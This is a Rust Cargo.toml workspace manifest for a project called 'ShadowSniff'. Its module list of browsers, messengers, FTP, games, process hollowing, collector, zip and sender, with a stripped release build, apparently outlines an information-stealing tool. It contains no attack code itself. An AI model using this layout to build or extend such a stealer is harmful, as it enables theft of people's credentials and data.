[package]
name = "ShadowSniff"
version = "0.1.0"
edition = "2024"

[workspace]
resolver = "3"
members = [
    "database",
    "ipinfo",
    "json",
    "requests",
    "shadowsniff",
    "shadowsniff/browsers",
    "shadowsniff/ftp",
    "shadowsniff/messengers",
    "shadowsniff/games",
    "tasks",
    "hollowing",
    "utils",
    "collector",
    "zip",
    "filesystem",
    "regedit",
    "sender"
]

[profile.release]
strip = true
opt-level = "z"
lto = true
codegen-units = 1
panic = "abort"

[profile.dev]
panic = "abort"

[dependencies]
windows-sys = { version = "0.59.0", features = [
    "Win32_Foundation",
] }
wee_alloc = "0.4.5"
shadowsniff = { path = "shadowsniff" }
tasks = { path = "tasks" }
utils = { path = "utils" }
ipinfo = { path = "ipinfo" }
collector = { path = "collector" }
zip = { path = "zip" }
filesystem = { path = "filesystem" }
sender = { path = "sender" }
rand_chacha = { version = "0.9.0", default-features = false }
rand_core = { version = "0.9.3", default-features = false }